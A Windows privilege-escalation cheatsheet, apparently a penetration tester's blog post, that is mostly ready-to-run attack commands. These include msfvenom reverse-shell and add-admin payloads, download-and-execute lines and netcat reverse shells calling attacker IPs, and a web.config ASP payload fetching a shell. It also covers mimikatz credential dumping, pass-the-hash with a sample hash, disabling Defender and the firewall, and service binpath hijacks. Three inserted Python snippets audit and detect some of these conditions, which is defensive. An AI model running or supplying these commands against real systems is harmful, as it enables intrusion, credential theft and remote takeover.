Windows Privilege Escalation Cheatsheet
Find OS Version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Check for Privileges
whoami /priv
List Running Services Using sc & wmic
wmic service where started=true get name, startname
#List all LocalSystem(Administrator) Services
wmic service get Name,DisplayName,StartName,State | findstr /I "LocalSystem"
wmic service get Name,StartName,State | findstr /I "LocalSystem Administrator"
#List All Services and their Privileges
wmic service get Name,DisplayName,StartName,State
#list All Services running as Admin
wmic service where "StartName='LocalSystem' or StartName='NT AUTHORITY\SYSTEM'" get Name,DisplayName,StartName,State
#Filter a Running Administrator Service
wmic service where "State='Running' and (StartName='LocalSystem' or StartName='NT AUTHORITY\SYSTEM')" get Name,DisplayName,StartName,State
#Using SC list all Services
sc query state= all
#Using SC list all Running Services
sc query state= all | findstr /I /C:"SERVICE_NAME:" /C:"STATE"
#Filter for Specific Service
sc query YourServiceName | findstr /I /C:"SERVICE_NAME:" /C:"STATE"
List Running Services using Powershell Get-WMIObject
#List All Running Services with their privileges - Service account
Get-WmiObject -Class Win32_Service | Select-Object Name, StartName | Format-Table -AutoSize
#More Info
Get-WmiObject -Class Win32_Service | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
#List Administrator Services
Get-WmiObject -Class Win32_Service | Where-Object { $_.StartName -match "LocalSystem|NT AUTHORITY\\SYSTEM|Administrator" } | Select-Object Name, StartName | Format-Table -AutoSize
#Running Services
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" } | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
#Filter for a specific Service under Running Services using Name
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" -and $_.Name -eq "YourServiceName" } | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" -and $_.Name -eq "vpnagent" } | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
#Filter for a Specific Service using Displayname
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" -and $_.DisplayName -eq "Windows Event Collector" } | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
AlwaysInstallElevated: Allows non-privileged users to run executables as SYSTEM
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If Available:
msfvenom -p windows/adduser USER=bhanu PASS=bhanu123 -f msi -o create_user.msi
On target:
msiexec /quiet /qn /i C:\create_user.msi
Metasploit:
use exploit/windows/local/always_install_elevated
Scheduled Tasks:
#Too much info
schtasks /query /fo LIST /v
Running Windows Services
net start
Services Running on Localhost
netstat -ano
netstat -an | find "LISTEN"
Using Plink:
plink.exe -l username -pw password KALI_IP -R Attacker_Port_to_receive:127.0.0.1:Victim_port_to_Forward
Example:
plink -l root -pw password KALI_IP -R 3390:127.0.0.1:3389
Portforward using Meterpreter:
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.1.101
Compiling 32-bit Exploits:
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
World Writable - Full Control (F) for Everyone or BUILTIN\Users
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Autologon Registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Powershell Command History
#Get the Commands History Path
(Get-PSReadLineOption).HistorySavePath
# Generally in the location %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
View Hidden Directories
dir -Force
Powershell Commands:
Get-ChildItem . -Force
gci -Force
ls -Force
Find Passwords in Registry
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server" /v PasswordViewOnly
vncpwd.exe PASSWORD_FROM_ABOVE
# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
IIS Webserver - Hidden Files and Config Files
dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
Anything in Credential Manager
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Check for Vulnerable Drivers
DRIVERQUERY
Find Installed Patches
wmic qfe get Caption,Description,HotFixID,InstalledOn
Using Runas to run as Different User
PsExec.exe -u hostname\username -p password "nc.exe TARGET_IP 443 -e cmd.exe"
C:\Windows\System32\runas.exe /env /noprofile /user:USERNAME PASSWORD "c:\users\Public\nc.exe -nc TARGET_IP 443 -e cmd.exe"
Using Powershell:
$secpasswd = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("USERNAME", $secpasswd)
$computer = "HOSTNAME"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
To run the Script:
powershell -ExecutionPolicy Bypass -File c:\users\public\r.ps1
Can We Access SAM & System Files
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Checking File Permissions using accesschk.exe
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *
#Check for RW permissions
accesschk.exe -uwcqv "username" *
Exploit:
sc config daclsvc binpath= "net localgroup administrators bhanu /add "
sc start daclsvc
What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it?
tasklist /svc
tasklist /v
net start
sc query
Always Install Elevated Privileges
If the "AlwaysInstallElevated" DWORD in these registry keys is set to "1", we can install any msi as NT Authority\System
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
OR
reg query "HKLM\Software\Policies\Microsoft\Windows\Installer"
reg query "HKCU\Software\Policies\Microsoft\Windows\Installer"
Exploit:
msfvenom -p windows/exec CMD='net localgroup administrators bhanu /add' -f msi-nouac -o exploit.msi
on Target: msiexec /quiet /qn /i C:\temp\exploit.msi
Scheduled Tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
Powershell:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Unquoted Service Paths - can be exploited - use PowerUP
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
OR
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
OR
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
Powershell:
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
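Added example (not part of the original cheatsheet): an offline audit for the unquoted service path condition the one-liners above look for, which also produces the quoted ImagePath to set as the fix. It goes slightly beyond the filters above by checking every start mode, and it assumes the service list was exported to CSV with Export-Csv; the sample rows and the function names are constructed for illustration.

```python
import csv
import io
import re

# Constructed sample (not from a real host), in the shape produced by:
#   Get-WmiObject Win32_Service | Select-Object Name, PathName, StartMode |
#       Export-Csv services.csv -NoTypeInformation
SAMPLE_CSV = r'''"Name","PathName","StartMode"
"GoodSvc","""C:\Program Files\Vendor App\svc.exe"" -k run","Auto"
"BadSvc","C:\Program Files\Vendor App\bin\agent.exe -service","Auto"
"NoSpace","C:\Tools\agent.exe","Auto"
"WinSvc","C:\Windows\system32\svchost.exe -k netsvcs","Auto"
"ManualBad","C:\Program Files\Old Tool\old.exe","Manual"
'''

# Image path up to the first ".exe" that is followed by whitespace or the end
# of the string, then whatever arguments remain.
IMAGE_RE = re.compile(r'^(.*?\.exe)(?=\s|$)(.*)$', re.IGNORECASE)


def audit_service(name, pathname, startmode):
    """Return a finding for an unquoted image path that contains a space."""
    path = (pathname or "").strip()
    if not path or path.startswith('"'):
        return None                      # empty, or already quoted
    m = IMAGE_RE.match(path)
    if not m:
        return None                      # no .exe image (for example a driver)
    image, args = m.group(1), m.group(2)
    if " " not in image:
        return None                      # unquoted but unambiguous
    return {
        "name": name,
        "start_mode": startmode,
        "image": image,
        # Corrected value for the service's ImagePath
        "quoted_path": f'"{image}"{args}',
    }


def audit_csv(text):
    """Audit every service row; auto-start services are listed first."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        hit = audit_service(row["Name"], row["PathName"], row["StartMode"])
        if hit:
            findings.append(hit)
    findings.sort(key=lambda f: f["start_mode"].lower() != "auto")
    return findings


if __name__ == "__main__":
    for f in audit_csv(SAMPLE_CSV):
        print(f'{f["name"]:<10} {f["start_mode"]:<7} fix -> {f["quoted_path"]}')
```
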
Juicy Potato Exploit - SeImpersonatePrivilege Enabled
JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=443 -f exe -o reverse.exe
./jp.exe -l 1345 -p c:\windows\temp\reverse.exe -t *
Operating System information is found in
C:\Windows\System32\license.rtf --> windows 7
C:\Windows\System32\eula.txt --> windows xp
Decrypt GPP Policy from Groups.xml
Groups.xml:
get-content "C:\programdata\Microsoft\group policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
<?xml version="1.0" encoding="UTF-8" ?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties>
</User>
</Groups>
gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ
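Added example (not part of the original cheatsheet): a scanner that walks a copy of the Group Policy preference files and reports every element that still carries a non-empty cpassword attribute, so the policy can be removed and the account's password rotated. It never decodes the value; the sample XML, its placeholder cpassword and the function names are constructed for illustration.

```python
import os
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the Groups.xml shown above; the
# cpassword value is a placeholder, not a real ciphertext.
SAMPLE_GROUPS_XML = b'''<?xml version="1.0" encoding="UTF-8" ?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" changed="2019-01-28 23:12:48">
    <Properties action="U" cpassword="PLACEHOLDER-NOT-A-REAL-VALUE" userName="Administrator"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup" changed="2020-03-02 10:00:00">
    <Properties action="U" cpassword="" userName="svc_backup"/>
  </User>
</Groups>'''


def scan_xml(data, source="<memory>"):
    """Report every element that carries a non-empty cpassword attribute.

    The value is never returned or decoded; its presence is the finding.
    Input is assumed to be a copy of your own policy files.
    """
    findings = []
    root = ET.fromstring(data)
    for parent in root.iter():
        for el in parent:
            if el.get("cpassword"):          # empty attribute is not a finding
                findings.append({
                    "source": source,
                    "element": f"{parent.tag}/{el.tag}",
                    "account": el.get("userName") or parent.get("name"),
                    "changed": parent.get("changed"),
                })
    return findings


def scan_tree(root_dir):
    """Walk a directory tree and scan every .xml file found in it."""
    findings, unreadable = [], []
    for folder, _dirs, files in os.walk(root_dir):
        for fname in files:
            if not fname.lower().endswith(".xml"):
                continue
            path = os.path.join(folder, fname)
            try:
                with open(path, "rb") as fh:
                    findings.extend(scan_xml(fh.read(), source=path))
            except (ET.ParseError, OSError):
                unreadable.append(path)      # review by hand, do not skip silently
    return findings, unreadable


if __name__ == "__main__":
    for f in scan_xml(SAMPLE_GROUPS_XML, source="sample Groups.xml"):
        print(f'{f["source"]}: {f["element"]} account={f["account"]} changed={f["changed"]}')
```
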
Check for Installed Patches
wmic qfe get Caption,Description,HotFixID,InstalledOn
Using Sherlock To Check Vulns
certutil -f -split -urlcache http://10.10.10.10/sherlock.ps1
powershell -nop -ep bypass
Import-Module .\sherlock.ps1
Find-AllVulns
Check these Config Files - Might contain Password
#Find Base64 password
type c:\windows\Panther\Unattended.xml
#Find Base64 password
type "c:\ProgramData\McAfee\Common Framework\SiteList.xml"
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
Priv Esc using a Service running as root:
services.msc
Select a service which you think might be vulnerable and go to the file's location in cmd
icacls scsiaccess.exe
#if Everyone is present, we can exploit it by replacing the original file with our file
in Kali: Let's create an exploit code for it :)
nano useradd.c
#include <stdlib.h>
int main()
{
    int i;
    i = system("net localgroup administrators username /add");
    return 0;
}
ctrl +x --> y
i586-mingw32msvc-gcc useradd.c -o useradd.exe
Copy this useradd.exe to the target machine and name it scsiaccess.exe
Restart the machine/service :)
services.msc
scsiaccess.exe --> right click --> restart
Powershell Sudo For Windows
$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
powershell -ExecutionPolicy Bypass -File xyz.ps1
Disable Firewall/Defender and Enable RDP for all Users
sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Downloading Files with bitsadmin
bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
PsExec Shell for Remote Systems
.\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe
Search for keyword "pass,cred,vnc and config"
dir /s *pass* == *cred* == *vnc* == *.config*
Search files with keyword "Password" in .xml, .ini, .txt files
findstr /si password *.xml *.ini *.txt
Grep Registry for "Password" Keyword
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Finding Services with incorrect permissions:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
If wmic is not available - try sc
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Windows XP Priv Esc - Incorrect Permission in Services
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.48 9002 -e C:\WINDOWS\System32\cmd.exe"
OR - run all the below commands together to create an Administrator account
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
sc config upnphost binpath= "net user bhanu bhanu123 /add"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "net localgroup administrators bhanu /add "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "reg add 'hklm\system\currentcontrolset\control\terminal server' /f /v fDenyTSConnections /t REG_DWORD /d 0 "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "netsh firewall set service remoteadmin enable "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "netsh firewall set service remotedesktop enable"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
in Kali:
rdesktop IP_Address
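Added example (not part of the original cheatsheet): detection logic for the service reconfiguration shown above, run over process-creation command lines such as those recorded by Security event 4688 or Sysmon event 1 when command-line logging is enabled. The sample lines are constructed from the commands on this page plus one benign change; the utility list and trusted directory prefixes are assumptions to tune per environment.

```python
import re

# Constructed sample command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r'sc config upnphost binpath= "net user bhanu bhanu123 /add"',
    r'sc config upnphost obj= ".\LocalSystem" password= ""',
    r'sc config SSDPSRV start= auto',
    r'sc.exe config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.48 9002 -e C:\WINDOWS\System32\cmd.exe"',
    r'sc config Spooler binpath= "C:\Windows\System32\spoolsv.exe"',
]

# sc [\\server] config <service> ... binpath= <value>
SC_CONFIG = re.compile(
    r'\bsc(?:\.exe)?\s+(?:\\\\\S+\s+)?config\s+(?P<svc>\S+)\s+'
    r'(?:.*?\s)?binpath=\s*(?P<val>"[^"]*"|\S+)',
    re.IGNORECASE,
)

# Assumptions: utilities that should never be a service image, and the
# directories where service binaries are expected to live.
ADMIN_TOOLS = {"net", "net1", "cmd", "powershell", "reg", "netsh"}
TRUSTED_PREFIXES = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


def check_cmdline(cmdline):
    """Return a finding if the command line sets a suspicious binPath."""
    m = SC_CONFIG.search(cmdline)
    if not m:
        return None                       # not a binPath change
    value = m.group("val").strip('"').strip()
    image = value.split()[0] if value else ""
    base = image.rsplit("\\", 1)[-1].lower()
    if base.endswith(".exe"):
        base = base[:-4]
    if base in ADMIN_TOOLS:
        reason = "binPath runs an admin utility instead of a service binary"
    elif not value.lower().startswith(TRUSTED_PREFIXES):
        reason = "binPath image is outside the standard install directories"
    else:
        return None
    return {"service": m.group("svc"), "binpath": value, "reason": reason}


def scan(cmdlines):
    """Check each command line and keep the index of every hit."""
    hits = []
    for i, line in enumerate(cmdlines):
        hit = check_cmdline(line)
        if hit:
            hit["line"] = i
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_CMDLINES):
        print(f'line {h["line"]}: {h["service"]}: {h["reason"]}')
```
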
IIS HTTP 6.0 Exploit
No Proper Input Validation, So change your exploit to
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f asp -o payload.html
move payload.html payload.asp;.html
Priv Esc From NT Authority Service to NT Authority System
Windows Server 2003 -- NT Authority Service to System
Download and copy the exploit to target machine
https://www.exploit-db.com/exploits/6705
Github
Exploiting IIS 6 with ASP .NET
copy churrasco.exe c:\windows\temp\
churrasco.exe -d "net users /add bhanu bhanu123"
churrasco.exe -d "net localgroup administrators bhanu /add"
churrasco.exe -d “reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0”
churrasco.exe -d "netsh firewall set service remoteadmin enable"
churrasco.exe -d "netsh firewall set service remotedesktop enable"
Might be Helpful - Rotten Potato
Session Hijacking - Privilege Impersonation
- when another user has a session on the same machine
- need to run as admin
#View the logged in sessions - users ; make sure the State is Disc (not-active)
query user
#create a service that runs as the other user ; /ID= the ID value from query user command; /dest= SESSION NAME from query user
# You should see "[SC] CreateSession SUCCESS"
sc create ServiceName binpath= "cmd.exe /k tscon 3 /dest:Attacker_SessionName"
#Start the service; ServiceName = the one that we created earlier
net start ServiceName
#you should be running as the user now.
Exploiting IIS httpd 7.5
You need to add the following code at the end of the web.config file, upload it to the server and get a reverse shell using it. The reverse shell should be in the winrevshell.ps1 file; a file sharing server should be turned on as well.
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Sample Web.config file with Exploit
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Mysql Running as Root
Download the UDF file from Here
Tutorial is here
use mysql;
create table potato(line blob);
insert into potato values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from potato into dumpfile '/usr/lib/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('bash -i >& /dev/tcp/IP_ADDRESS/443 0>&1');
OR try the automated script
Github Exploit
Video Tutorial
Meterpreter ASP Reverse Shell or Windows
msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.11.0.48 LPORT=9001 -f asp > shell.asp
Dumping Credentials using mimikatz
mimikatz.exe
#You should see 200 OK
privilege::debug
#dump creds and other info
sekurlsa::logonpasswords
Current User:
whoami /all
List out all Users:
net user
Add a user:
net user bhanu bhanu123 /add
Adding a user to Administrators Group:
net localgroup administrators bhanu /add
Remove a user:
net user bhanu /del
Check for Active Users using Powershell:
powershell -Command (get-wmiobject win32_useraccount
View Hidden Directories:
dir -Force
dir /R
Get a Proper Windows Shell:
apt-get install rlwrap
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
rlwrap nc -nvlp 9001
Hot Potato - Exploit
Importing a Powershell Exploit and execute it
powershell -ep bypass -nop
Import-Module .\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net users \add bhanu"
Invoke-Tater -Trigger 1 -Command "net localgroup administrators bhanu /add"
Download and Execute a Reverse Shell
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
python -m SimpleHTTPServer 8001
nc -nvlp 9001
#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1
Change ACL for a file
cacls "C:\Users\Administrator\Desktop\root.txt" /E /P Alfred:F
cacls Windows utility to view/edit file permissions
/E to edit ACL
/P to set permissions
Alfred:F to give Alfred full control of the file
Add this to Cron Jobs To get a Shell
echo "IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/rev9002.ps1')" > cronjob_FileName.ps1
Logging in with NTLM hashes
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
Create RDP Access on a Target Machine
Useful when you have remote code execution
#Create an account named Bhanu
net user /add bhanu bhanu123
#Assign Admin Privs
net localgroup administrators bhanu /add
#Start RDP Service
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
On kali:
rdesktop 10.10.10.10
{Metasploit} Login with NTLM Pass hashes into a Windows machine
use exploit/windows/smb/psexec
set rhost 10.10.10.10
set smbuser administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
set lport 8888
exploit
#Enable RDP on Target
run getgui -e
shell
net user administrator password
on Kali:
rdesktop 10.10.10.10 administrator password
Check for Hidden Files:
get-content .\root.txt -stream *
get-content .\root.txt -stream root.txt
Run as admin with prev saved cred
runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt > C:\users\security\root.txt"
File transfer using Certutil.exe
certutil.exe -urlcache -split -f http://10.10.14.6/sherlock.ps1 sherlock.ps1
Priv Esc (getting Root) using Metasploit
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.6 LPORT=9003 --platform win -a x64 -f exe > shell.exe
certutil -urlcache -f http://10.10.14.6:8001/shell.exe shell.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lport 9003
set lhost 10.10.14.6
run
run post/multi/recon/local_exploit_suggester
background
*********** use exploit/local/EXPLPOIT-SUGGESTED************
set lport 9004
set lhost 10.10.14.6
run
getuid
Transfer Files Using FTP Service
echo open 10.10.14.19>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get ms15.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt
python -m pyftpdlib -p 21
Transfer Files & Getting Root Shell
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.12.61:8001/shell.exe', 'shell.exe')
Create Exploit:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.12.61 LPORT=31337 -e x86/shikata_ga_nai -f exe -o shell.exe
python -m SimpleHTTPServer 8001
dir | findstr shell
runas /user:Administrator /noprofile /savecred "cmd.exe /c shell.exe"
Transfer Files & Getting Root Shell
Building the Payload: /usr/share/nishang/Shells/Invoke-PowershellTcp.ps1
already available on kali, if not Download from here.
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 9001" >> Invoke-PowershellTcp.ps1
python -m SimpleHTTPServer 8001
Transferring the Payload:
cd C:\Users\security\AppData\Local\Temp\
certutil -f -split -urlcache http://10.10.10.10:8001/Invoke-PowershellTcp.ps1
Run As Admin:
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"
nc -nvlp 9001
Useful Powershell Commands
Download a File using Power Shell:
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.14.19:8001/41015.exe', 'shell.exe')
Download a File Using Power Shell:
nc.exe 10.10.10.10 8002 < CEH.kdbx
Execute a Command in Java Shell
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
Execute a Command in Java Shell
println "cmd.exe /c dir".execute().text
Upload a file using Power shell: in a java shell
def process = "powershell -command Invoke-WebRequest 'http://10.10.10.10:8001/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");
Get a Reverse Shell using Powershell
def process = "powershell -command ./nc.exe 10.10.10.10 9001 -e cmd.exe".execute();
println("${process.text}");
nc.exe should be in the same directory; use the above command to download it.
Download and Execute Powershell Script on Victim Machine
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
python -m SimpleHTTPServer 8001
nc -nvlp 9001
#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1
Download and Execute Powershell Script on Victim Machine
- Method II
powershell Invoke-WebRequest -Uri 10.10.14.35:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe
python -m SimpleHTTPServer 8001
C:\users\administrator\downloads\nc.exe -e cmd 10.10.14.35 9001
nc -nvlp 9001
Let me know if I missed something important and You can find Linux Privilege Escalation Cheatsheet here